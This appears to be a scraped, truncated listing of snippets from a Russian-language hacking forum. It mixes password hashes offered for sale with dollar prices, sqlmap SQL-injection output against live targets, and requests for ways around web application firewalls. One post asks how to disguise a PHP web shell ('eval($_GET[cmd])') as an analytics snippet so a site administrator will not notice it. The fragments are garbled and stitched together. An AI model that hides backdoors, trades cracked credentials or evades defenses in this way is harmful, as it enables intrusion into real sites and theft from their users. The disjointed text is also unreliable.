Separate names with a comma.
1308434949755a2966a3015995c5a87a:PXw 10$
46a0f8d180aefb88f89cd085ff369e0b:lit 7aaafd00fbd8289c59dd3c926e7fb271:lit 595c36303914a81c20098c8d272e118b:[|r...
Parameter: JSON #1* ((custom) POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl ause...
https://www.sendspace.com/file/t5s27l добавляешь код на своей странице <img src=test.com/s.gif</imp>
https://www.test.com/src/ Package: league/flysystem Version: 1.0.70.0 CVE: CVE-2021-32708 Title: Time-of-check Time-of-use (TOCTOU) Race...
fc2feb843abc33678950d6965688a675:qXJ 20$ $P$BoZp20tjdY82Aa5QQWkeKpEKGKE2AT0 40$
Подскажите как можно спрятать шелл код чтоб у админа не было подозрений допустим <?php eval($_GET[cmd]); ?> Выглядел так: <!-- Yandex.Metrika...
8fc445e1336f80f83999ea353cb057aa67669405:d22f0512c0bf1d15c1585926b3970750...
{"success":false,"message":"SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that...
Продолжение темы!Да ваф не пускает именно sqlmap!Как он(ваф) определяет что запрос делает именно sqlmap?Какие варианты обхода есть?
Поставил на Burp -"SQLMap DNS Collaborator" запускаю мап с настройками --dns-domain=zzzzzz.burpcollaborator.net. [CRITICAL] unable to connect to...
Первый раз столкнулся с такой уязвимостью Бурп Говорит sql The URL path filename appears to be vulnerable to SQL injection attacks. The...
hash=f09ab0f3e2e069e79301118408b70018607d87b97f910854
469d89cac0dc6257c5f4ace67e78e8377bbcafb1:1756594892 sha1 pass salt
475c6f898920fe2dbaa469dfe2ddfb8600f11340:1088199118 a5a124b0f459b193662b72840a2163e9c55787d9:1215598100...
[08:04:48] [WARNING] there is a possibility that the target (or WAF/IPS) is drop ping 'suspicious' requests Как можно обойти? [08:04:48]...
не помогло(
Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://' AND...
дел
953059131935db36c735494d0006d8d341f981a6ba014e95